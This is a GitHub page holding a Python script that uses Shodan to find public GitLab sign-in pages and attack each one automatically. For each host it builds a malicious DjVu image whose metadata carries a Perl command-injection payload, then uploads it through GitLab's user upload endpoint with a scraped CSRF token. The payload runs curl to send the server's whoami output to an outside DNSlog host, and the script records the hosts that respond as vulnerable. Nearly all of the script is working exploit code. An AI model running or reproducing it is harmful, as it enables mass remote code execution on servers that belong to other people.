-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathshodan-scanner.py
124 lines (100 loc) · 3.86 KB
/
shodan-scanner.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
#!/usr/bin/python3
"""
Modified by: @faisalfs10x
GitHub: https://github.com/faisalfs10x
"""
import requests
import shodan
from bs4 import BeautifulSoup
import time
import os
requests.packages.urllib3.disable_warnings()
SHODAN_API_KEY = " " # insert your shodan api key
api = shodan.Shodan(SHODAN_API_KEY)
outfile = "target_result.txt"
def djvumake_check():
# Checking if djvumake is installed
check = os.popen('which djvumake').read()
if (check == ""):
exit("djvumake not installed. Install by running command : sudo apt install djvulibre-bin")
def query():
try:
# Shodan query
results = api.search(' title:"Sign in Gitlab" ')
print("Shodan query started...")
# Show the total results
print('Targets found: {}'.format(results['total']))
print('')
for field in results['matches']:
host = field.get('ip_str')
port = str(field.get('port'))
if port == '443':
target = "https://%s" % (host)
elif port.endswith('443'):
target = "https://%s:%s" % (host, port)
else:
target = "http://%s:%s" % (host, port)
check(target)
except shodan.APIError as e:
print('Error: {}'.format(e))
def check(target):
session = requests.Session()
payload = "\" . qx{`curl $(whoami).rqihma.dnslog.cn`} . \\\n" # replace your own DNSlog Platform or burp collaborator
f1 = open("/tmp/sploit","w")
f1.write('(metadata\n')
f1.write(' (Copyright "\\\n')
f1.write(payload)
f1.write('" b ") )')
f1.close()
os.system('djvumake /tmp/sploit.jpg INFO=0,0 BGjp=/dev/null ANTa=/tmp/sploit')
try:
time.sleep(1) # sleep 1 sec to avoid requests.ConnectionError ('Connection aborted.', ConnectionResetError(104, 'Connection reset by peer'))
r = session.get(target + "/users/sign_in", verify=False, timeout=30) # add timeout if scanner hanging due to unresponding target
soup = BeautifulSoup(r.text, features="lxml")
csrf = soup.findAll('meta')[16].get("content")
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36',
'Accept': 'application/json',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Referer': f'{target}/projects',
'Connection': 'close',
'Upgrade-Insecure-Requests': '1',
'X-Requested-With': 'XMLHttpRequest',
'X-CSRF-Token': f'{csrf}'
}
files = {'file': ('sploit.jpg', open('/tmp/sploit.jpg', 'rb'), 'image/jpeg', {'Expires': '0'})}
r = session.post(target +'/uploads/user', files=files, headers=headers, verify=False, timeout=30)
marker = 'Failed to process image' # response marker
if marker in r.text:
print(target + " [+] vulnerable")
with open(outfile, "a+") as f:
f.write(target + "\n")
f.close()
else:
print(target + " [-] failed")
except KeyboardInterrupt:
exit('User aborted!')
except requests.ConnectionError as e:
print(target + " - Connection failure")
#print(str(e))
except requests.Timeout as e:
print(target + " - Timeout Error")
#print(str(e))
except requests.RequestException as e:
print(target + " - General Error")
#print(str(e))
except:
print(target + " - Error")
def main():
try:
djvumake_check()
query()
except Exception as e:
exit(e)
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
exit('User aborted!')
print("[+] Result saved to "+ outfile +" [+]")